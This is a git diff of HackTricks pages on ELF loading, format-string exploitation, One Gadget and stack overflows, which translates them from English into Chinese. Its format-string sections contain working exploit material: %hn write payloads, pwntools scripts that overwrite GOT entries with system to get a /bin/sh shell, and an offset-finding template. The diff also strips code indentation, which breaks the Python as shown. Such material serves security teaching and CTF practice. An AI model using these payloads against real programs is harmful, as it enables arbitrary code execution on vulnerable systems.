+- **类型**：NOTYPE（未指定类型）、OBJECT（全局数据变量）、FUNC（函数）、SECTION（节）、FILE（调试器的源代码文件）、TLS（线程局部变量）、GNU_IFUNC（用于重定位的间接函数）
+- **节**：它所在的索引
+- **值**（内存中的地址）
+- **大小**
 
+## 动态节
 ```
 readelf -d lnstat
 
 Dynamic section at offset 0xfc58 contains 28 entries:
-  Tag        Type                         Name/Value
- 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
- 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-aarch64.so.1]
- 0x000000000000000c (INIT)               0x1088
- 0x000000000000000d (FINI)               0x2f74
- 0x0000000000000019 (INIT_ARRAY)         0x1fc48
- 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
- 0x000000000000001a (FINI_ARRAY)         0x1fc50
- 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
- 0x000000006ffffef5 (GNU_HASH)           0x338
- 0x0000000000000005 (STRTAB)             0x7f0
- 0x0000000000000006 (SYMTAB)             0x358
- 0x000000000000000a (STRSZ)              510 (bytes)
- 0x000000000000000b (SYMENT)             24 (bytes)
- 0x0000000000000015 (DEBUG)              0x0
- 0x0000000000000003 (PLTGOT)             0x1fe58
- 0x0000000000000002 (PLTRELSZ)           960 (bytes)
- 0x0000000000000014 (PLTREL)             RELA
- 0x0000000000000017 (JMPREL)             0xcc8
- 0x0000000000000007 (RELA)               0xaa0
- 0x0000000000000008 (RELASZ)             552 (bytes)
- 0x0000000000000009 (RELAENT)            24 (bytes)
- 0x000000000000001e (FLAGS)              BIND_NOW
- 0x000000006ffffffb (FLAGS_1)            Flags: NOW PIE
- 0x000000006ffffffe (VERNEED)            0xa50
- 0x000000006fffffff (VERNEEDNUM)         2
- 0x000000006ffffff0 (VERSYM)             0x9ee
- 0x000000006ffffff9 (RELACOUNT)          15
- 0x0000000000000000 (NULL)               0x0
+Tag        Type                         Name/Value
+0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
+0x0000000000000001 (NEEDED)             Shared library: [ld-linux-aarch64.so.1]
+0x000000000000000c (INIT)               0x1088
+0x000000000000000d (FINI)               0x2f74
+0x0000000000000019 (INIT_ARRAY)         0x1fc48
+0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
+0x000000000000001a (FINI_ARRAY)         0x1fc50
+0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
+0x000000006ffffef5 (GNU_HASH)           0x338
+0x0000000000000005 (STRTAB)             0x7f0
+0x0000000000000006 (SYMTAB)             0x358
+0x000000000000000a (STRSZ)              510 (bytes)
+0x000000000000000b (SYMENT)             24 (bytes)
+0x0000000000000015 (DEBUG)              0x0
+0x0000000000000003 (PLTGOT)             0x1fe58
+0x0000000000000002 (PLTRELSZ)           960 (bytes)
+0x0000000000000014 (PLTREL)             RELA
+0x0000000000000017 (JMPREL)             0xcc8
+0x0000000000000007 (RELA)               0xaa0
+0x0000000000000008 (RELASZ)             552 (bytes)
+0x0000000000000009 (RELAENT)            24 (bytes)
+0x000000000000001e (FLAGS)              BIND_NOW
+0x000000006ffffffb (FLAGS_1)            Flags: NOW PIE
+0x000000006ffffffe (VERNEED)            0xa50
+0x000000006fffffff (VERNEEDNUM)         2
+0x000000006ffffff0 (VERSYM)             0x9ee
+0x000000006ffffff9 (RELACOUNT)          15
+0x0000000000000000 (NULL)               0x0
 ```
+NEEDED 目录表示程序 **需要加载提到的库** 以便继续。NEEDED 目录在共享 **库完全运行并准备好** 使用后完成。
 
-The NEEDED directory indicates that the program **needs to load the mentioned library** in order to continue. The NEEDED directory completes once the shared **library is fully operational and ready** for use.
-
-## Relocations
-
-The loader also must relocate dependencies after having loaded them. These relocations are indicated in the relocation table in formats REL or RELA and the number of relocations is given in the dynamic sections RELSZ or RELASZ.
+## 重定位
 
+加载器在加载依赖项后还必须进行重定位。这些重定位在重定位表中以 REL 或 RELA 格式指示，重定位的数量在动态部分 RELSZ 或 RELASZ 中给出。
 ```
 readelf -r lnstat
 
 Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries:
-  Offset          Info           Type           Sym. Value    Sym. Name + Addend
+Offset          Info           Type           Sym. Value    Sym. Name + Addend
 00000001fc48  000000000403 R_AARCH64_RELATIV                    1d10
 00000001fc50  000000000403 R_AARCH64_RELATIV                    1cc0
 00000001fff0  000000000403 R_AARCH64_RELATIV                    1340
@@ -273,7 +264,7 @@ Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries:
 00000001fff8  002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0
 
 Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
-  Offset          Info           Type           Sym. Value    Sym. Name + Addend
+Offset          Info           Type           Sym. Value    Sym. Name + Addend
 00000001fe70  000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0
 00000001fe78  000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0
 00000001fe80  000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0
@@ -315,83 +306,77 @@ Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
 00000001ffa0  002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0
 00000001ffa8  003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0
 ```
+### 静态重定位
 
-### Static Relocations
+如果**程序加载的位置不同**于首选地址（通常是0x400000），因为该地址已被使用或由于**ASLR**或其他原因，静态重定位**修正指针**，这些指针的值期望二进制文件加载在首选地址。
 
-If the **program is loaded in a place different** from the preferred address (usually 0x400000) because the address is already used or because of **ASLR** or any other reason, a static relocation **corrects pointers** that had values expecting the binary to be loaded in the preferred address.
+例如，任何类型为`R_AARCH64_RELATIV`的节应该在重定位偏移量加上附加值的基础上修改地址。
 
-For example any section of type `R_AARCH64_RELATIV` should have modified the address at the relocation bias plus the addend value.
+### 动态重定位和GOT
 
-### Dynamic Relocations and GOT
+重定位也可以引用外部符号（如依赖项中的函数）。例如，libC中的malloc函数。然后，加载器在加载libC时检查malloc函数加载的位置，它会将此地址写入GOT（全局偏移表）中（在重定位表中指示），其中应指定malloc的地址。
 
-The relocation could also reference an external symbol (like a function from a dependency). Like the function malloc from libC. Then, the loader when loading libC in an address checking where the malloc function is loaded, it will write this address in the GOT (Global Offset Table) table (indicated in the relocation table) where the address of malloc should be specified.
+### 过程链接表
 
-### Procedure Linkage Table
+PLT节允许执行惰性绑定，这意味着函数位置的解析将在第一次访问时进行。
 
-The PLT section allows to perform lazy binding, which means that the resolution of the location of a function will be performed the first time it's accessed.
+因此，当程序调用malloc时，它实际上调用的是PLT中`malloc`的相应位置（`malloc@plt`）。第一次调用时，它解析`malloc`的地址并存储，以便下次调用`malloc`时，使用该地址而不是PLT代码。
 
-So when a program calls to malloc, it actually calls the corresponding location of `malloc` in the PLT (`malloc@plt`). The first time it's called it resolves the address of `malloc` and stores it so next time `malloc` is called, that address is used instead of the PLT code.
-
-## Program Initialization
-
-After the program has been loaded it's time for it to run. However, the first code that is run i**sn't always the `main`** function. This is because for example in C++ if a **global variable is an object of a class**, this object must be **initialized** **before** main runs, like in:
+## 程序初始化
 
+在程序加载后，是时候运行它了。然而，运行的第一段代码**并不总是`main`**函数。这是因为例如在C++中，如果**全局变量是一个类的对象**，则该对象必须在main运行**之前**进行**初始化**，如：
 ```cpp
 #include <stdio.h>
 // g++ autoinit.cpp -o autoinit
 class AutoInit {
-    public:
-        AutoInit() {
-            printf("Hello AutoInit!\n");
-        }
-        ~AutoInit() {
-            printf("Goodbye AutoInit!\n");
-        }
+public:
+AutoInit() {
+printf("Hello AutoInit!\n");
+}
+~AutoInit() {
+printf("Goodbye AutoInit!\n");
+}
 };
 
 AutoInit autoInit;
 
 int main() {
-    printf("Main\n");
-    return 0;
+printf("Main\n");
+return 0;
 }
 ```
+请注意，这些全局变量位于 `.data` 或 `.bss` 中，但在 `__CTOR_LIST__` 和 `__DTOR_LIST__` 列表中，初始化和析构的对象按顺序存储，以便跟踪它们。
 
-Note that these global variables are located in `.data` or `.bss` but in the lists `__CTOR_LIST__` and `__DTOR_LIST__` the objects to initialize and destruct are stored in order to keep track of them.
-
-From C code it's possible to obtain the same result using the GNU extensions :
-
+从 C 代码中，可以使用 GNU 扩展获得相同的结果：
 ```c
 __attributte__((constructor)) //Add a constructor to execute before
 __attributte__((destructor)) //Add to the destructor list
 ```
+从编译器的角度来看，要在 `main` 函数执行之前和之后执行这些操作，可以创建一个 `init` 函数和一个 `fini` 函数，这些函数将在动态部分中被引用为 **`INIT`** 和 **`FIN`**，并被放置在 ELF 的 `init` 和 `fini` 部分。
 
-From a compiler perspective, to execute these actions before and after the `main` function is executed, it's possible to create a `init` function and a `fini` function which would be referenced in the dynamic section as **`INIT`** and **`FIN`**. and are placed in the `init` and `fini` sections of the ELF.
+另一个选项，如前所述，是在动态部分的 **`INIT_ARRAY`** 和 **`FINI_ARRAY`** 条目中引用列表 **`__CTOR_LIST__`** 和 **`__DTOR_LIST__`**，这些的长度由 **`INIT_ARRAYSZ`** 和 **`FINI_ARRAYSZ`** 指示。每个条目都是一个函数指针，将在没有参数的情况下被调用。
 
-The other option, as mentioned, is to reference the lists **`__CTOR_LIST__`** and **`__DTOR_LIST__`** in the **`INIT_ARRAY`** and **`FINI_ARRAY`** entries in the dynamic section and the length of these are indicated by **`INIT_ARRAYSZ`** and **`FINI_ARRAYSZ`**. Each entry is a function pointer that will be called without arguments.
+此外，还可以有一个 **`PREINIT_ARRAY`**，其中包含将在 **`INIT_ARRAY`** 指针之前执行的 **指针**。
 
-Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** that will be executed **before** the **`INIT_ARRAY`** pointers.
+### 初始化顺序
 
-### Initialization Order
+1. 程序被加载到内存中，静态全局变量在 **`.data`** 中初始化，未初始化的变量在 **`.bss`** 中被置为零。
+2. 程序或库的所有 **依赖项** 被 **初始化**，并执行 **动态链接**。
+3. 执行 **`PREINIT_ARRAY`** 函数。
+4. 执行 **`INIT_ARRAY`** 函数。
+5. 如果有 **`INIT`** 条目，则调用它。
+6. 如果是库，dlopen 在这里结束；如果是程序，则是调用 **真实入口点**（`main` 函数）的时间。
 
-1. The program is loaded into memory, static global variables are initialized in **`.data`** and unitialized ones zeroed in **`.bss`**.
-2. All **dependencies** for the program or libraries are **initialized** and the the **dynamic linking** is executed.
-3. **`PREINIT_ARRAY`** functions are executed.
-4. **`INIT_ARRAY`** functions are executed.
-5. If there is a **`INIT`** entry it's called.
-6. If a library, dlopen ends here, if a program, it's time to call the **real entry point** (`main` function).
+## 线程局部存储 (TLS)
 
-## Thread-Local Storage (TLS)
+它们在 C++ 中使用关键字 **`__thread_local`** 定义，或使用 GNU 扩展 **`__thread`**。
 
-They are defined using the keyword **`__thread_local`** in C++ or the GNU extension **`__thread`**.
+每个线程将为此变量维护一个唯一的位置，因此只有该线程可以访问其变量。
 
-Each thread will maintain a unique location for this variable so only the thread can access its variable.
+使用此功能时，ELF 中将使用 **`.tdata`** 和 **`.tbss`** 部分。这些部分类似于 `.data`（已初始化）和 `.bss`（未初始化），但用于 TLS。
 
-When this is used the sections **`.tdata`** and **`.tbss`** are used in the ELF. Which are like `.data` (initialized) and `.bss` (not initialized) but for TLS.
+每个变量将在 TLS 头中有一个条目，指定大小和 TLS 偏移量，即它将在线程的本地数据区域中使用的偏移量。
 
-Each variable will hace an entry in the TLS header specifying the size and the TLS offset, which is the offset it will use in the thread's local data area.
-
-The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module.
+`__TLS_MODULE_BASE` 是一个符号，用于引用线程局部存储的基地址，并指向内存中包含模块所有线程局部数据的区域。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
index 5150b15e8..b0c309624 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
@@ -2,14 +2,13 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-In C **`printf`** is a function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
+在 C 中，**`printf`** 是一个可以用来 **打印** 字符串的函数。该函数期望的 **第一个参数** 是 **带格式的原始文本**。后续的 **参数** 是 **替代** 原始文本中 **格式化符** 的 **值**。
 
-The vulnerability appears when an **attacker text is used as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to read and **write any data in any address (readable/writable)**. Being able this way to **execute arbitrary code**.
-
-#### Formatters:
+当 **攻击者的文本作为第一个参数** 被用作此函数时，漏洞就会出现。攻击者将能够构造一个 **特殊输入，利用** **printf 格式** 字符串的能力来读取和 **写入任何地址（可读/可写）** 中的 **任何数据**。这样就能够 **执行任意代码**。
 
+#### 格式化符：
 ```bash
 %08x —> 8 hex bytes
 %d —> Entire
@@ -19,57 +18,45 @@ The vulnerability appears when an **attacker text is used as the first argument*
 %hn —> Occupies 2 bytes instead of 4
 <n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
 ```
+**示例：**
 
-**Examples:**
-
-- Vulnerable example:
-
+- 漏洞示例：
 ```c
 char buffer[30];
 gets(buffer);  // Dangerous: takes user input without restrictions.
 printf(buffer);  // If buffer contains "%x", it reads from the stack.
 ```
-
-- Normal Use:
-
+- 正常使用：
 ```c
 int value = 1205;
 printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
 ```
-
-- With Missing Arguments:
-
+- 缺失参数：
 ```c
 printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
 ```
+### **访问指针**
 
-### **Accessing Pointers**
-
-The format **`%<n>$x`**, where `n` is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do:
-
+格式 **`%<n>$x`**，其中 `n` 是一个数字，允许指示 printf 选择第 n 个参数（来自栈）。因此，如果您想使用 printf 读取栈中的第 4 个参数，可以这样做：
 ```c
 printf("%x %x %x %x")
 ```
+并且你会从第一个参数读取到第四个参数。
 
-and you would read from the first to the forth param.
-
-Or you could do:
-
+或者你可以这样做：
 ```c
 printf("$4%x")
 ```
+并直接读取第四个。
 
-and read directly the forth.
-
-Notice that the attacker controls the `pr`**`intf` parameter, which basically means that** his input is going to be in the stack when `printf` is called, which means that he could write specific memory addresses in the stack.
+注意攻击者控制了 `pr`**`intf` 参数，这基本上意味着** 他的输入将在调用 `printf` 时位于栈中，这意味着他可以在栈中写入特定的内存地址。
 
 > [!CAUTION]
-> An attacker controlling this input, will be able to **add arbitrary address in the stack and make `printf` access them**. In the next section it will be explained how to use this behaviour.
+> 控制此输入的攻击者将能够 **在栈中添加任意地址并使 `printf` 访问它们**。下一节将解释如何利用这种行为。
 
-## **Arbitrary Read**
-
-It's possible to use the formatter **`$n%s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
+## **任意读取**
 
+可以使用格式化器 **`$n%s`** 使 **`printf`** 获取位于 **n 位置** 的 **地址**，并 **将其打印为字符串**（打印直到找到 0x00）。因此，如果二进制文件的基地址是 **`0x8048000`**，并且我们知道用户输入从栈的第 4 个位置开始，则可以使用以下方式打印二进制文件的开头：
 ```python
 from pwn import *
 
@@ -82,61 +69,55 @@ payload += p32(0x8048000) #6th param
 p.sendline(payload)
 log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
 ```
-
 > [!CAUTION]
-> Note that you cannot put the address 0x8048000 at the begining of the input because the string will be cat in 0x00 at the end of that address.
+> 注意，您不能将地址 0x8048000 放在输入的开头，因为字符串将在该地址的末尾以 0x00 截断。
 
-## **Arbitrary Write**
+## **任意写入**
 
-The formatter **`$<num>%n`** **writes** the **number of written bytes** in the **indicated address** in the \<num> param in the stack. If an attacker can write as many char as he will with printf, he is going to be able to make **`$<num>%n`** write an arbitrary number in an arbitrary address.
-
-Fortunately, to write the number 9999, it's not needed to add 9999 "A"s to the input, in order to so so it's possible to use the formatter **`%.<num-write>%<num>$n`** to write the number **`<num-write>`** in the **address pointed by the `num` position**.
+格式化器 **`$<num>%n`** **写入** 在堆栈中 \<num> 参数所指示地址的 **已写入字节数**。如果攻击者可以使用 printf 写入任意数量的字符，他将能够使 **`$<num>%n`** 在任意地址写入任意数字。
 
+幸运的是，要写入数字 9999，不需要在输入中添加 9999 个 "A"，为了做到这一点，可以使用格式化器 **`%.<num-write>%<num>$n`** 在 **`num` 位置指向的地址** 中写入数字 **`<num-write>`**。
 ```bash
 AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
 AAAA.%500\$08x —> Param at offset 500
 ```
+然而，请注意，通常为了写入一个地址，例如 `0x08049724`（这是一个一次性写入的巨大数字），**使用的是 `$hn`** 而不是 `$n`。这允许**只写入 2 字节**。因此，这个操作需要进行两次，一次用于地址的最高 2B，另一次用于最低的部分。
 
-However, note that usually in order to write an address such as `0x08049724` (which is a HUGE number to write at once), **it's used `$hn`** instead of `$n`. This allows to **only write 2 Bytes**. Therefore this operation is done twice, one for the highest 2B of the address and another time for the lowest ones.
+因此，这个漏洞允许**在任何地址写入任何内容（任意写入）。**
 
-Therefore, this vulnerability allows to **write anything in any address (arbitrary write).**
-
-In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques:
+在这个例子中，目标是**覆盖**一个**函数**在**GOT**表中的**地址**，该函数将在稍后被调用。尽管这可能会滥用其他任意写入到执行的技术：
 
 {{#ref}}
 ../arbitrary-write-2-exec/
 {{#endref}}
 
-We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.\
-As mentioned, to write the address, usually 2 steps are needed: You **first writes 2Bytes** of the address and then the other 2. To do so **`$hn`** is used.
+我们将**覆盖**一个**接收**来自**用户**的**参数**的**函数**，并将其**指向****`system`** **函数**。\
+如前所述，写入地址通常需要 2 个步骤：您**首先写入地址的 2 字节**，然后写入另外 2 字节。为此使用**`$hn`**。
 
-- **HOB** is called to the 2 higher bytes of the address
-- **LOB** is called to the 2 lower bytes of the address
+- **HOB** 被调用为地址的 2 个高字节
+- **LOB** 被调用为地址的 2 个低字节
 
-Then, because of how format string works you need to **write first the smallest** of \[HOB, LOB] and then the other one.
+然后，由于格式字符串的工作原理，您需要**首先写入较小的** \[HOB, LOB]，然后写入另一个。
 
-If HOB < LOB\
+如果 HOB < LOB\
 `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`
 
-If HOB > LOB\
+如果 HOB > LOB\
 `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
 
 HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
-
 ```bash
 python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
 ```
+### Pwntools 模板
 
-### Pwntools Template
-
-You can find a template to prepare a exploit for this kind of vulnerability in:
+您可以在以下位置找到准备此类漏洞利用的模板：
 
 {{#ref}}
 format-strings-template.md
 {{#endref}}
 
-Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite):
-
+或者这个基本示例来自 [**这里**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)：
 ```python
 from pwn import *
 
@@ -155,17 +136,15 @@ p.sendline('/bin/sh')
 
 p.interactive()
 ```
-
-## Other Examples & References
+## 其他示例与参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
 - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
 - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html)
-  - 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
+- 32 位，无 relro，无 canary，nx，无 pie，基本使用格式字符串从栈中泄露标志（无需更改执行流程）
 - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
-  - 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win)
+- 32 位，relro，无 canary，nx，无 pie，格式字符串覆盖地址 `fflush` 以调用 win 函数（ret2win）
 - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
-  - 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands.
+- 32 位，relro，无 canary，nx，无 pie，格式字符串在 `.fini_array` 中写入 main 内的地址（使流程再循环一次）并将地址写入 GOT 表中的 `system`，指向 `strlen`。当流程返回到 main 时，`strlen` 将使用用户输入并指向 `system`，它将执行传递的命令。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
index bb4c3a570..37491cf26 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
@@ -1,5 +1,4 @@
 {{#include ../../../banners/hacktricks-training.md}}
-
 ```python
 from pwn import *
 from time import sleep
@@ -34,23 +33,23 @@ print(" ====================== ")
 
 
 def connect_binary():
-    global P, ELF_LOADED, ROP_LOADED
+global P, ELF_LOADED, ROP_LOADED
 
-    if LOCAL:
-        P = process(LOCAL_BIN) # start the vuln binary
-        ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-        ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+if LOCAL:
+P = process(LOCAL_BIN) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
-    elif REMOTETTCP:
-        P = remote('10.10.10.10',1338) # start the vuln binary
-        ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-        ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+elif REMOTETTCP:
+P = remote('10.10.10.10',1338) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
-    elif REMOTESSH:
-        ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
-        P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
-        ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-        ROP_LOADED = ROP(elf)# Find ROP gadgets
+elif REMOTESSH:
+ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(elf)# Find ROP gadgets
 
 
 #######################################
@@ -58,39 +57,39 @@ def connect_binary():
 #######################################
 
 def send_payload(payload):
-    payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
-    log.info("payload = %s" % repr(payload))
-    if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
-    P.sendline(payload)
-    sleep(0.5)
-    return P.recv()
+payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
+log.info("payload = %s" % repr(payload))
+if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
+P.sendline(payload)
+sleep(0.5)
+return P.recv()
 
 
 def get_formatstring_config():
-    global P
+global P
 
-    for offset in range(1,1000):
-        connect_binary()
-        P.clean()
+for offset in range(1,1000):
+connect_binary()
+P.clean()
 
-        payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
-        recieved = send_payload(payload).strip()
+payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
+recieved = send_payload(payload).strip()
 
-        if b"41" in recieved:
-            for padlen in range(0,4):
-                if b"41414141" in recieved:
-                    connect_binary()
-                    payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
-                    recieved = send_payload(payload).strip()
-                    print(recieved)
-                    if b"42424242" in recieved:
-                        log.info(f"Found offset ({offset}) and padlen ({padlen})")
-                        return offset, padlen
+if b"41" in recieved:
+for padlen in range(0,4):
+if b"41414141" in recieved:
+connect_binary()
+payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
+recieved = send_payload(payload).strip()
+print(recieved)
+if b"42424242" in recieved:
+log.info(f"Found offset ({offset}) and padlen ({padlen})")
+return offset, padlen
 
-                else:
-                    connect_binary()
-                    payload = b" " + payload
-                    recieved = send_payload(payload).strip()
+else:
+connect_binary()
+payload = b" " + payload
+recieved = send_payload(payload).strip()
 
 
 # In order to exploit a format string you need to find a position where part of your payload
@@ -123,10 +122,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}")
 
 connect_binary()
 if GDB and not REMOTETTCP and not REMOTESSH:
-    # attach gdb and continue
-    # You can set breakpoints, for example "break *main"
-    gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
-    sleep(5)
+# attach gdb and continue
+# You can set breakpoints, for example "break *main"
+gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
+sleep(5)
 
 format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
 #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
@@ -138,6 +137,4 @@ format_string.execute_writes()
 
 P.interactive()
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
index 3b03a8a87..1485f814d 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
@@ -2,22 +2,19 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-[**One Gadget**](https://github.com/david942j/one_gadget) allows to obtain a shell instead of using **system** and **"/bin/sh". One Gadget** will find inside the libc library some way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\
-However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
+[**One Gadget**](https://github.com/david942j/one_gadget) 允许获取一个 shell，而不是使用 **system** 和 **"/bin/sh"**。**One Gadget** 将在 libc 库中找到一些方法来获取一个 shell (`execve("/bin/sh")`)，只需一个 **地址**。\
+然而，通常会有一些限制，最常见且容易避免的限制是 `[rsp+0x30] == NULL`。由于你控制 **RSP** 内部的值，你只需发送一些额外的 NULL 值，以避免这个限制。
 
 ![](<../../images/image (615).png>)
-
 ```python
 ONE_GADGET = libc.address + 0x4526a
 rop2 = base + p64(ONE_GADGET) + "\x00"*100
 ```
-
-To the address indicated by One Gadget you need to **add the base address where `libc`** is loaded.
+要到达 One Gadget 指定的地址，您需要 **添加 `libc` 加载的基地址**。
 
 > [!TIP]
-> One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP chains** as you only need to call one address (and fulfill the requirements).
+> One Gadget 对于 **任意写入 2 执行技术** 是一个 **很大的帮助**，并且可能 **简化 ROP 链**，因为您只需调用一个地址（并满足要求）。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
index 6e7d04a48..40a48e5a2 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
@@ -2,36 +2,33 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## What is a Stack Overflow
+## 什么是栈溢出
 
-A **stack overflow** is a vulnerability that occurs when a program writes more data to the stack than it is allocated to hold. This excess data will **overwrite adjacent memory space**, leading to the corruption of valid data, control flow disruption, and potentially the execution of malicious code. This issue often arises due to the use of unsafe functions that do not perform bounds checking on input.
+**栈溢出**是一种漏洞，当程序向栈写入的数据超过其分配的容量时就会发生。这些多余的数据将**覆盖相邻的内存空间**，导致有效数据的损坏、控制流的中断，并可能执行恶意代码。这个问题通常是由于使用不安全的函数而引起的，这些函数对输入没有进行边界检查。
 
-The main problem of this overwrite is that the **saved instruction pointer (EIP/RIP)** and the **saved base pointer (EBP/RBP)** to return to the previous function are **stored on the stack**. Therefore, an attacker will be able to overwrite those and **control the execution flow of the program**.
